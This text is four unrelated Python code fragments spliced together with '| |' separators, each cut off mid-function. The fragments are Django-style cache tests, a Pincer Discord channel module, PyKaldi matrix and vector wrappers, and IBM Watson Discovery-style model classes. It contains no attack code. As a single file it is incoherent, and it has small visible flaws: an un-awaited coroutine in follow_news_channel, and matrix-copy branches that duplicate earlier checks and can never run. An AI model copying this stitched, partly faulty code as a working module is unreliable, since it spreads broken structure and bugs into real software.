cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using | |
# Copyright Pincer 2021-Present
# Full MIT License can be found in `LICENSE` at the project root.
from __future__ import annotations
from asyncio import sleep, ensure_future
from dataclasses import dataclass
from enum import IntEnum
from typing import AsyncIterator, overload, TYPE_CHECKING
from .invite import Invite, InviteTargetType
from ..message.user_message import UserMessage
from ..._config import GatewayConfig
from ...utils.api_data import APIDataGen
from ...utils.api_object import APIObject, GuildProperty
from ...utils.convert_message import convert_message
from ...utils.types import MISSING
if TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from .member import GuildMember
from .overwrite import Overwrite
from .thread import ThreadMetadata
from .webhook import Webhook
from ..message.message import Message
from ..message.embed import Embed
from ..user.user import User
from ...client import Client
from ...objects import ThreadMember
from ...utils.timestamp import Timestamp
from ...utils.types import APINullable
from ...utils.snowflake import Snowflake
class ChannelType(IntEnum):
"""Represents a channel its type.
Attributes
----------
GUILD_TEXT:
A text channel.
DM:
A DM channel.
GUILD_VOICE:
A voice channel.
GROUP_DM:
A group DM channel.
GUILD_CATEGORY:
A category channel.
GUILD_NEWS:
A news channel.
GUILD_STORE:
A store channel.
GUILD_NEWS_THREAD:
A news thread.
GUILD_PUBLIC_THREAD:
A public thread.
GUILD_PRIVATE_THREAD:
A private thread.
GUILD_STAGE_VOICE:
A stage channel.
"""
GUILD_TEXT = 0
DM = 1
GUILD_VOICE = 2
GROUP_DM = 3
GUILD_CATEGORY = 4
GUILD_NEWS = 5
GUILD_STORE = 6
if GatewayConfig.version >= 9:
GUILD_NEWS_THREAD = 10
GUILD_PUBLIC_THREAD = 11
GUILD_PRIVATE_THREAD = 12
GUILD_STAGE_VOICE = 13
@dataclass(repr=False)
class Channel(APIObject, GuildProperty): # noqa E501
"""Represents a Discord Channel Mention object
Attributes
----------
id: :class:`~pincer.utils.snowflake.Snowflake`
The id of this channel
type: :class:`~pincer.objects.guild.channel.ChannelType`
The type of channel
application_id: APINullable[:class:`~pincer.utils.snowflake.Snowflake`]
Application id of the group DM creator if it is bot-created
bitrate: APINullable[:class:`int`]
The bitrate (in bits) of the voice channel
default_auto_archive_duration: APINullable[:class:`int`]
Default duration for newly created threads, in minutes, to
automatically archive the thread after recent activity, can be set to:
60, 1440, 4320, 10080
guild_id: APINullable[:class:`~pincer.utils.snowflake.Snowflake`]
The id of the guild (maybe missing for some channel objects received
over gateway guild dispatches)
icon: APINullable[Optional[:class:`str`]]
Icon hash
last_message_id: APINullable[Optional[:class:`~pincer.utils.snowflake.Snowflake`]]
The id of the last message sent in this channel (may not point to an
existing or valid message)
last_pin_timestamp: APINullable[Optional[:class:`~pincer.utils.timestamp.Timestamp`]]
When the last pinned message was pinned. This may be null in events
such as GUILD_CREATE when a message is not pinned.
member: APINullable[:class:`~pincer.objects.guild.member.GuildMember`]
Thread member object for the current user, if they have joined the
thread, only included on certain API endpoints
member_count: APINullable[:class:`int`]
An approximate count of users in a thread, stops counting at 50
message_count: :class:`int`
An approximate count of messages in a thread, stops counting at 50
name: APINullable[:class:`str`]
The name of the channel (1-100 characters)
nsfw: APINullable[:class:`bool`]
Whether the channel is nsfw
owner_id: APINullable[:class:`~pincer.utils.snowflake.Snowflake`]
Id of the creator of the group DM or thread
parent_id: APINullable[Optional[:class:`~pincer.utils.snowflake.Snowflake`]]
For guild channels: id of the parent category for a channel (each
parent category can contain up to 50 channels), for threads: id of the
text channel this thread was created
permissions: APINullable[:class:`str`]
Computed permissions for the invoking user in the channel, including
overwrites, only included when part of the resolved data received on a
slash command interaction
permission_overwrites: APINullable[List[:class:`~pincer.objects.guild.overwrite.Overwrite`]]
Explicit permission overwrites for members and roles
position: APINullable[:class:`int`]
Sorting position of the channel
rate_limit_per_user: APINullable[:class:`int`]
Amount of seconds a user has to wait before sending another message
(0-21600); bots, as well as users with the permission manage_messages
or manage_channel, are unaffected
recipients: APINullable[List[:class:`~pincer.objects.user.user.User`]]
The recipients of the DM
rtc_region: APINullable[Optional[:class:`str`]]
Voice region id for the voice channel, automatic when set to null
thread_metadata: APINullable[:class:`~pincer.objects.guild.thread.ThreadMetadata`]
Thread-specific fields not needed by other channels
topic: APINullable[Optional[:class:`str`]]
The channel topic (0-1024 characters)
user_limit: APINullable[:class:`int`]
The user limit of the voice channel
video_quality_mode: APINullable[:class:`int`]
The camera video quality mode of the voice channel, 1 when not present
"""
# noqa: E501
id: Snowflake
type: ChannelType
application_id: APINullable[Snowflake] = MISSING
bitrate: APINullable[int] = MISSING
default_auto_archive_duration: APINullable[int] = MISSING
guild_id: APINullable[Snowflake] = MISSING
icon: APINullable[Optional[str]] = MISSING
last_message_id: APINullable[Optional[Snowflake]] = MISSING
last_pin_timestamp: APINullable[Optional[Timestamp]] = MISSING
member: APINullable[GuildMember] = MISSING
member_count: APINullable[int] = MISSING
message_count: APINullable[int] = MISSING
name: APINullable[str] = MISSING
nsfw: APINullable[bool] = MISSING
owner_id: APINullable[Snowflake] = MISSING
parent_id: APINullable[Optional[Snowflake]] = MISSING
permissions: APINullable[str] = MISSING
permission_overwrites: APINullable[List[Overwrite]] = MISSING
# Position is always 0 when not sent
position: APINullable[int] = 0
rate_limit_per_user: APINullable[int] = MISSING
recipients: APINullable[List[User]] = MISSING
rtc_region: APINullable[Optional[str]] = MISSING
thread_metadata: APINullable[ThreadMetadata] = MISSING
topic: APINullable[Optional[str]] = MISSING
user_limit: APINullable[int] = MISSING
video_quality_mode: APINullable[int] = MISSING
@property
def mention(self):
return f"<#{self.id}>"
@classmethod
async def from_id(cls, client: Client, channel_id: int) -> Channel:
"""|coro|
Creates a channel object. You should use the ``get_channel`` method
from :class:`~pincer.client.Client` most of the time. The
``get_dm_channel`` method from :class:`~pincer.objects.user.user.User`
should be used if you need to create a dm_channel. Using the ``send()``
method from :class:`~pincer.objects.user.user.User` is preferred.
Parameters
----------
client : :class:`~pincer.client.Client`
Client object to use the HTTP class of.
channel_id : :class:`int`
ID of the channel you want.
Returns
-------
:class:`~pincer.objects.guild.channel.Channel`
The channel object.
"""
data = (await client.http.get(f"channels/{channel_id}")) or {}
data.update({"type": ChannelType(data.pop("type"))})
channel_cls = _channel_type_map.get(data["type"], Channel)
return channel_cls.from_dict(data)
@overload
async def edit(
self,
*,
name: str = None,
type: ChannelType = None,
position: int = None,
topic: str = None,
nsfw: bool = None,
rate_limit_per_user: int = None,
bitrate: int = None,
user_limit: int = None,
permissions_overwrites: List[Overwrite] = None,
parent_id: Snowflake = None,
rtc_region: str = None,
video_quality_mod: int = None,
default_auto_archive_duration: int = None,
) -> Channel:
...
async def edit(self, reason: Optional[str] = None, **kwargs):
"""|coro|
Edit a channel with the given keyword arguments.
Parameters
----------
reason Optional[:class:`str`]
The reason of the channel delete.
\\*\\*kwargs :
The keyword arguments to edit the channel with.
Returns
-------
:class:`~pincer.objects.guild.channel.Channel`
The updated channel object.
"""
headers = {}
if reason is not None:
headers["X-Audit-Log-Reason"] = str(reason)
data = await self._http.patch(
f"channels/{self.id}", kwargs, headers=headers
)
data.update({"type": ChannelType(data.pop("type"))})
channel_cls = _channel_type_map.get(data["type"], Channel)
return channel_cls.from_dict(data)
async def edit_permissions(
self,
overwrite: Overwrite,
allow: str,
deny: str,
type: int,
reason: Optional[str] = None,
):
"""|coro|
Edit the channel permission overwrites for a user or role in a channel.
Only usable for guild channels. Requires the ``MANAGE_ROLES`` permission.
Only permissions your bot has in the guild or channel can be
allowed/denied (unless your bot has a ``MANAGE_ROLES`` overwrite in the channel).
Parameters
----------
overwrite: :class:`~pincer.objects.guild.overwrite.Overwrite`
The overwrite object.
allow: :class:`str`
The bitwise value of all allowed permissions.
deny: :class:`str`
The bitwise value of all denied permissions.
type: :class:`int`
0 for a role or 1 for a member.
reason: Optional[:class:`str`]
The reason of the channel delete.
"""
await self._http.put(
f"channels/{self.id}/permissions/{overwrite.id}",
headers={"X-Audit-Log-Reason": reason},
data={"allow": allow, "deny": deny, "type": type},
)
async def delete_permission(
self, overwrite: Overwrite, reason: Optional[str] = None
):
"""|coro|
Delete a channel permission overwrite for a user or role in a channel.
Only usable for guild channels. Requires the ``MANAGE_ROLES`` permission.
Parameters
----------
overwrite: :class:`~pincer.objects.guild.overwrite.Overwrite`
The overwrite object.
reason: Optional[:class:`str`]
The reason of the channel delete.
"""
await self._http.delete(
f"channels/{self.id}/permissions/{overwrite.id}",
headers={"X-Audit-Log-Reason": reason},
)
async def follow_news_channel(
self, webhook_channel_id: Snowflake
) -> NewsChannel:
"""|coro|
Follow a News Channel to send messages to a target channel.
Requires the ``MANAGE_WEBHOOKS`` permission in the target channel.
Returns a followed channel object.
Parameters
----------
webhook_channel_id: :class:`Snowflake`
The ID of the channel to follow.
Returns
-------
:class:`~pincer.objects.guild.channel.NewsChannel`
The followed channel object.
"""
return NewsChannel.from_dict(
self._http.post(
f"channels/{self.id}/followers",
data={"webhook_channel_id": webhook_channel_id},
)
)
async def trigger_typing_indicator(self):
"""|coro|
Post a typing indicator for the specified channel.
Generally bots should **not** implement this route. However, if a bot is
responding to a command and expects the computation to take a few
seconds, this endpoint may be called to let the user know that the bot
is processing their message.
"""
await self._http.post(f"channels/{self.id}/typing")
def get_pinned_messages(self) -> APIDataGen[UserMessage]:
"""|coro|
Fetches all pinned messages in the channel. Returns an iterator of
pinned messages.
Returns
-------
:class:`AsyncIterator[:class:`~pincer.objects.guild.message.UserMessage`]`
An iterator of pinned messages.
"""
return APIDataGen(
UserMessage,
self._http.get(f"channels/{self.id}/pins")
)
async def pin_message(
self, message: UserMessage, reason: Optional[str] = None
):
"""|coro|
Pin a message in a channel. Requires the ``MANAGE_MESSAGES`` permission.
| |
= SubVector(obj)
self.resize_(obj.dim, _matrix_common.MatrixResizeType.UNDEFINED)
self.copy_(obj)
def __delitem__(self, index):
"""Removes an element from the vector."""
if not (0 <= index < self.dim):
raise IndexError("index={} should be in the range [0,{})."
.format(index, self.dim))
self._remove_element_(index)
class SubVector(_VectorBase, _matrix_ext.SubVector):
"""Single precision vector view."""
def __init__(self, obj, start=0, length=None):
"""Creates a new vector view from a vector like object.
If possible the new vector view will share its data with the `obj`,
i.e. no copy will be made. A copy will only be made if `obj.__array__`
returns a copy, if `obj` is a sequence, or if a copy is needed to
satisfy any of the other requirements (data type, order, etc.).
Regardless of whether a copy is made or not, the new vector view will
not own the memory buffer backing it, i.e. it will not support vector
operations that reallocate memory.
Args:
obj (vector_like): A vector, a 1-D numpy array, any object exposing
a 1-D array interface, an object whose __array__ method returns
a 1-D numpy array, or any sequence that can be interpreted as a
vector.
start (int): The index of the view start. Defaults to 0.
length (int): The length of the view. If None, it is set to
len(obj) - start. Defaults to None.
"""
if not isinstance(obj, _kaldi_vector.VectorBase):
obj = numpy.array(obj, dtype=numpy.float32, copy=False, order='C')
if obj.ndim != 1:
raise ValueError("obj should be a 1-D vector like object.")
obj_len = len(obj)
if not (0 <= start <= obj_len):
raise IndexError("start={0} should be in the range [0,{1}] "
"when len(obj)={1}.".format(start, obj_len))
max_len = obj_len - start
if length is None:
length = max_len
if not (0 <= length <= max_len):
raise IndexError("length={} should be in the range [0,{}] when "
"start={} and len(obj)={}."
.format(length, max_len, start, obj_len))
super(SubVector, self).__init__(obj, start, length)
class _MatrixBase(object):
"""Base class defining the additional API for single precision matrices.
No constructor.
"""
def copy_(self, src, trans=_matrix_common.MatrixTransposeType.NO_TRANS):
"""Copies the elements from another matrix.
Args:
src(Matrix or SpMatrix or TpMatrix or DoubleMatrix or DoubleSpMatrix or DoubleTpMatrix or CompressedMatrix):
The input matrix.
trans (MatrixTransposeType): Whether to use **src** or its transpose.
Defaults to ``MatrixTransposeType.NO_TRANS``. Not active if
input is a compressed matrix.
Raises:
ValueError: In case of size mismatch.
"""
if self.size() != src.size():
raise ValueError("Cannot copy matrix with dimensions {s[0]}x{s[1]} "
"into matrix with dimensions {d[0]}x{d[1]}"
.format(s=src.size(), d=self.size()))
if isinstance(src, _kaldi_matrix.MatrixBase):
self._copy_from_mat_(src, trans)
elif isinstance(src, _sp_matrix.SpMatrix):
_kaldi_matrix_ext._copy_from_sp(self, src)
elif isinstance(src, _tp_matrix.TpMatrix):
_kaldi_matrix_ext._copy_from_tp(self, src, trans)
elif isinstance(src, _kaldi_matrix.DoubleMatrixBase):
_kaldi_matrix_ext._copy_from_double_mat(self, src, trans)
elif isinstance(src, _sp_matrix.SpMatrix):
_kaldi_matrix_ext._copy_from_double_sp(self, src)
elif isinstance(src, _tp_matrix.TpMatrix):
_kaldi_matrix_ext._copy_from_double_tp(self, src, trans)
elif isinstance(src, _compressed_matrix.CompressedMatrix):
_kaldi_matrix_ext._copy_from_cmat(self, src)
else:
raise TypeError("input matrix type is not supported.")
return self
def clone(self):
"""Clones the matrix.
The clone allocates new memory for its contents and supports matrix
operations that reallocate memory, i.e. it is not a view.
Returns:
Matrix: A copy of the matrix.
"""
return Matrix(self)
def size(self):
"""Returns the size of the matrix.
Returns:
A tuple (num_rows, num_cols) of integers.
"""
return self.num_rows, self.num_cols
@property
def shape(self):
"""Two element tuple representing the size of the matrix."""
return self.size()
def approx_equal(self, other, tol=0.01):
"""Checks if matrices are approximately equal.
Args:
other (Matrix): The matrix to compare against.
tol (float): The tolerance for the equality check.
Defaults to ``0.01``.
Returns:
True if `self.size() == other.size()` and
`||self-other|| <= tol*||self||`. False otherwise.
"""
if not isinstance(other, _kaldi_matrix.MatrixBase):
return False
if self.num_rows != other.num_rows or self.num_cols != other.num_cols:
return False
return self._approx_equal(other, tol)
def __eq__(self, other):
return self.approx_equal(other, 1e-16)
def numpy(self):
"""Converts the matrix to a 2-D NumPy array.
The NumPy array is a view into the matrix, i.e. no data is copied.
Returns:
numpy.ndarray: A NumPy array sharing data with this matrix.
"""
return _matrix_ext.matrix_to_numpy(self)
@property
def data(self):
"""Matrix data as a memoryview."""
return self.numpy().data
def row_data(self, index):
"""Returns row data as a memoryview."""
return self[index].data
def row(self, index):
"""Returns the given row as a new vector view.
Args:
index (int): The row index.
Returns:
SubVector: A vector view representing the given row.
"""
return self[index]
def range(self, row_start, num_rows, col_start, num_cols):
"""Returns the given range of elements as a new matrix view.
Args:
row_start (int): The start row index.
num_rows (int): The number of rows.
col_start (int): The start column index.
num_cols (int): The number of columns.
Returns:
SubMatrix: A matrix view representing the given range.
"""
return SubMatrix(self, row_start, num_rows, col_start, num_cols)
def row_range(self, row_start, num_rows):
"""Returns the given range of rows as a new matrix view.
Args:
row_start (int): The start row index.
num_rows (int): The number of rows.
Returns:
SubMatrix: A matrix view representing the given row range.
"""
return SubMatrix(self, row_start, num_rows, 0, self.num_cols)
def col_range(self, col_start, num_cols):
"""Returns the given range of columns as a new matrix view.
Args:
col_start (int): The start column index.
num_cols (int): The number of columns.
Returns:
SubMatrix: A matrix view representing the given column range.
"""
return SubMatrix(self, 0, self.num_rows, col_start, num_cols)
def eig(self):
"""Computes eigendecomposition.
Factorizes a square matrix into :math:`P\\ D\\ P^{-1}`.
The relationship of :math:`D` to the eigenvalues is slightly
complicated, due to the need for :math:`P` to be real. In the symmetric
case, :math:`D` is diagonal and real, but in the non-symmetric case
there may be complex-conjugate pairs of eigenvalues. In this case, for
the equation :math:`y = P\\ D\\ P^{-1}` to hold, :math:`D` must actually
be block diagonal, with 2x2 blocks corresponding to any such pairs. If a
pair is :math:`\\lambda +- i\\mu`, :math:`D` will have a corresponding
2x2 block :math:`[\\lambda, \\mu; -\\mu, \\lambda]`. Note that if the
matrix is not invertible, :math:`P` may not be invertible so in this
case instead of the equation :math:`y = P\\ D\\ P^{-1}` holding, we have
:math:`y\\ P = P\\ D`.
Returns:
3-element tuple containing
- **P** (:class:`Matrix`): The eigenvector matrix, where ith column
corresponds to the ith eigenvector.
- **r** (:class:`Vector`): The vector with real components of the
eigenvalues.
- **i** (:class:`Vector`): The vector with imaginary components of
the eigenvalues.
Raises:
ValueError: If the matrix is not square.
"""
m, n = self.size()
if m != n:
raise ValueError("eig method cannot be called on a non-square "
"matrix.")
P = Matrix(n, n)
r, i = Vector(n), Vector(n)
self._eig(P, r, i)
return P, r, i
def svd(self, destructive=False):
"""Computes singular-value decomposition.
Factorizes a matrix into :math:`U\\ diag(s)\\ V^T`.
For non-square matrices, requires `self.num_rows >= self.num_cols`.
Args:
destructive (bool): Whether to use the destructive operation which
avoids a copy but mutates self. Defaults to ``False``.
Returns:
3-element tuple containing
- **s** (:class:`Vector`): The vector of singular values.
- **U** (:class:`Matrix`): The left orthonormal matrix.
- **Vt** (:class:`Matrix`): The right orthonormal matrix.
Raises:
ValueError: If `self.num_rows < self.num_cols`.
Note:
**Vt** in the output is already transposed.
The singular values in **s** are not sorted.
See Also:
:meth:`singular_values`
:meth:`sort_svd`
"""
m, n = self.size()
if m < n:
raise ValueError("svd for non-square matrices requires "
"self.num_rows >= self.num_cols.")
U, Vt = Matrix(m, n), Matrix(n, n)
s = Vector(n)
if destructive:
self._destructive_svd_(s, U, Vt)
else:
self._svd(s, U, Vt)
return s, U, Vt
def singular_values(self):
"""Computes singular values.
Returns:
Vector: The vector of singular values.
"""
res = Vector(self.num_cols)
self._singular_values(res)
return res
def add_mat_(self, alpha, M,
trans=_matrix_common.MatrixTransposeType.NO_TRANS):
"""Adds another matrix to this one.
Performs the operation :math:`S = \\alpha\\ M + S`.
Args:
alpha (float): The scalar multiplier.
M (Matrix or SpMatrix or DoubleSpMatrix): The input matrix.
trans (MatrixTransposeType): Whether to use **M** or its transpose.
Defaults to ``MatrixTransposeType.NO_TRANS``.
Raises:
RuntimeError: In case of size mismatch.
"""
if isinstance(M, _kaldi_matrix.MatrixBase):
self._add_mat_(alpha, M, trans)
elif isinstance(M, _sp_matrix.SpMatrix):
_kaldi_matrix_ext.add_sp(self, alpha, M)
elif isinstance(M, _sp_matrix.DoubleSpMatrix):
_kaldi_matrix_ext.add_double_sp(self, alpha, M)
else:
raise TypeError("input matrix type is not supported.")
return self
def add_mat_mat_(self, A, B,
transA=_matrix_common.MatrixTransposeType.NO_TRANS,
transB=_matrix_common.MatrixTransposeType.NO_TRANS,
alpha=1.0, beta=1.0, sparseA=False, sparseB=False):
"""Adds the product of given matrices.
Performs the operation :math:`M = \\alpha\\ A\\ B + \\beta\\ M`.
Args:
A (Matrix or TpMatrix or SpMatrix):
| |
args['use_passage'] = _dict.get('use_passage')
if 'field' in _dict:
args['field'] = _dict.get('field')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ComponentSettingsFieldsShownBody object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'use_passage') and self.use_passage is not None:
_dict['use_passage'] = self.use_passage
if hasattr(self, 'field') and self.field is not None:
_dict['field'] = self.field
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ComponentSettingsFieldsShownBody object."""
return json.dumps(self._to_dict(), indent=2)
def __eq__(self, other: 'ComponentSettingsFieldsShownBody') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ComponentSettingsFieldsShownBody') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ComponentSettingsFieldsShownTitle():
"""
Title label.
:attr str field: (optional) Use a specific field as the title.
"""
def __init__(self, *, field: str = None) -> None:
"""
Initialize a ComponentSettingsFieldsShownTitle object.
:param str field: (optional) Use a specific field as the title.
"""
self.field = field
@classmethod
def from_dict(cls, _dict: Dict) -> 'ComponentSettingsFieldsShownTitle':
"""Initialize a ComponentSettingsFieldsShownTitle object from a json dictionary."""
args = {}
valid_keys = ['field']
bad_keys = set(_dict.keys()) - set(valid_keys)
if bad_keys:
raise ValueError(
'Unrecognized keys detected in dictionary for class ComponentSettingsFieldsShownTitle: '
+ ', '.join(bad_keys))
if 'field' in _dict:
args['field'] = _dict.get('field')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ComponentSettingsFieldsShownTitle object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'field') and self.field is not None:
_dict['field'] = self.field
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ComponentSettingsFieldsShownTitle object."""
return json.dumps(self._to_dict(), indent=2)
def __eq__(self, other: 'ComponentSettingsFieldsShownTitle') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ComponentSettingsFieldsShownTitle') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ComponentSettingsResponse():
"""
A response containing the default component settings.
:attr ComponentSettingsFieldsShown fields_shown: (optional) Fields shown in the
results section of the UI.
:attr bool autocomplete: (optional) Whether or not autocomplete is enabled.
:attr bool structured_search: (optional) Whether or not structured search is
enabled.
:attr int results_per_page: (optional) Number or results shown per page.
:attr List[ComponentSettingsAggregation] aggregations: (optional) a list of
component setting aggregations.
"""
def __init__(
self,
*,
fields_shown: 'ComponentSettingsFieldsShown' = None,
autocomplete: bool = None,
structured_search: bool = None,
results_per_page: int = None,
aggregations: List['ComponentSettingsAggregation'] = None) -> None:
"""
Initialize a ComponentSettingsResponse object.
:param ComponentSettingsFieldsShown fields_shown: (optional) Fields shown
in the results section of the UI.
:param bool autocomplete: (optional) Whether or not autocomplete is
enabled.
:param bool structured_search: (optional) Whether or not structured search
is enabled.
:param int results_per_page: (optional) Number or results shown per page.
:param List[ComponentSettingsAggregation] aggregations: (optional) a list
of component setting aggregations.
"""
self.fields_shown = fields_shown
self.autocomplete = autocomplete
self.structured_search = structured_search
self.results_per_page = results_per_page
self.aggregations = aggregations
@classmethod
def from_dict(cls, _dict: Dict) -> 'ComponentSettingsResponse':
"""Initialize a ComponentSettingsResponse object from a json dictionary."""
args = {}
valid_keys = [
'fields_shown', 'autocomplete', 'structured_search',
'results_per_page', 'aggregations'
]
bad_keys = set(_dict.keys()) - set(valid_keys)
if bad_keys:
raise ValueError(
'Unrecognized keys detected in dictionary for class ComponentSettingsResponse: '
+ ', '.join(bad_keys))
if 'fields_shown' in _dict:
args['fields_shown'] = ComponentSettingsFieldsShown._from_dict(
_dict.get('fields_shown'))
if 'autocomplete' in _dict:
args['autocomplete'] = _dict.get('autocomplete')
if 'structured_search' in _dict:
args['structured_search'] = _dict.get('structured_search')
if 'results_per_page' in _dict:
args['results_per_page'] = _dict.get('results_per_page')
if 'aggregations' in _dict:
args['aggregations'] = [
ComponentSettingsAggregation._from_dict(x)
for x in (_dict.get('aggregations'))
]
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ComponentSettingsResponse object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'fields_shown') and self.fields_shown is not None:
_dict['fields_shown'] = self.fields_shown._to_dict()
if hasattr(self, 'autocomplete') and self.autocomplete is not None:
_dict['autocomplete'] = self.autocomplete
if hasattr(self,
'structured_search') and self.structured_search is not None:
_dict['structured_search'] = self.structured_search
if hasattr(self,
'results_per_page') and self.results_per_page is not None:
_dict['results_per_page'] = self.results_per_page
if hasattr(self, 'aggregations') and self.aggregations is not None:
_dict['aggregations'] = [x._to_dict() for x in self.aggregations]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ComponentSettingsResponse object."""
return json.dumps(self._to_dict(), indent=2)
def __eq__(self, other: 'ComponentSettingsResponse') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ComponentSettingsResponse') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class DeleteDocumentResponse():
"""
Information returned when a document is deleted.
:attr str document_id: (optional) The unique identifier of the document.
:attr str status: (optional) Status of the document. A deleted document has the
status deleted.
"""
def __init__(self, *, document_id: str = None, status: str = None) -> None:
"""
Initialize a DeleteDocumentResponse object.
:param str document_id: (optional) The unique identifier of the document.
:param str status: (optional) Status of the document. A deleted document
has the status deleted.
"""
self.document_id = document_id
self.status = status
@classmethod
def from_dict(cls, _dict: Dict) -> 'DeleteDocumentResponse':
"""Initialize a DeleteDocumentResponse object from a json dictionary."""
args = {}
valid_keys = ['document_id', 'status']
bad_keys = set(_dict.keys()) - set(valid_keys)
if bad_keys:
raise ValueError(
'Unrecognized keys detected in dictionary for class DeleteDocumentResponse: '
+ ', '.join(bad_keys))
if 'document_id' in _dict:
args['document_id'] = _dict.get('document_id')
if 'status' in _dict:
args['status'] = _dict.get('status')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a DeleteDocumentResponse object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'document_id') and self.document_id is not None:
_dict['document_id'] = self.document_id
if hasattr(self, 'status') and self.status is not None:
_dict['status'] = self.status
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this DeleteDocumentResponse object."""
return json.dumps(self._to_dict(), indent=2)
def __eq__(self, other: 'DeleteDocumentResponse') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'DeleteDocumentResponse') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class StatusEnum(Enum):
"""
Status of the document. A deleted document has the status deleted.
"""
DELETED = "deleted"
class DocumentAccepted():
"""
Information returned after an uploaded document is accepted.
:attr str document_id: (optional) The unique identifier of the ingested
document.
:attr str status: (optional) Status of the document in the ingestion process. A
status of `processing` is returned for documents that are ingested with a
*version* date before `2019-01-01`. The `pending` status is returned for all
others.
"""
def __init__(self, *, document_id: str = None, status: str = None) -> None:
"""
Initialize a DocumentAccepted object.
:param str document_id: (optional) The unique identifier of the ingested
document.
:param str status: (optional) Status of the document in the ingestion
process. A status of `processing` is returned for documents that are
ingested with a *version* date before `2019-01-01`. The `pending` status is
returned for all others.
"""
self.document_id = document_id
self.status = status
@classmethod
def from_dict(cls, _dict: Dict) -> 'DocumentAccepted':
"""Initialize a DocumentAccepted object from a json dictionary."""
args = {}
valid_keys = ['document_id', 'status']
bad_keys = set(_dict.keys()) - set(valid_keys)
if bad_keys:
raise ValueError(
'Unrecognized keys detected in dictionary for class DocumentAccepted: '
